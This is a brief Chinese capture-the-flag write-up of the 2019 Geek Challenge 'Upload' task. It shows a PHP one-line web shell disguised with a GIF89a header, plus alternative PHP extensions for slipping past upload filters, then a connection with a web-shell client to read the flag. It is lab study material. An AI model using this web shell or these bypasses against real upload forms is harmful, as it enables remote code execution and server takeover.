极客大挑战 2019 Upload

打开题目是个上传,随便上传一个图片 竟然告诉我NOT image
所以考虑一下文件类型绕过

1
2
3
常用一句话:
GIF89a?
<script language="php">eval($_REQUEST[shell])</script>

PHP绕过后缀名检测:

1
php,php3,php4,php5,phtml.pht

avatar

上传成功,用蚁剑连接
在根目录下得到flag

注意,文件都存在upload目录下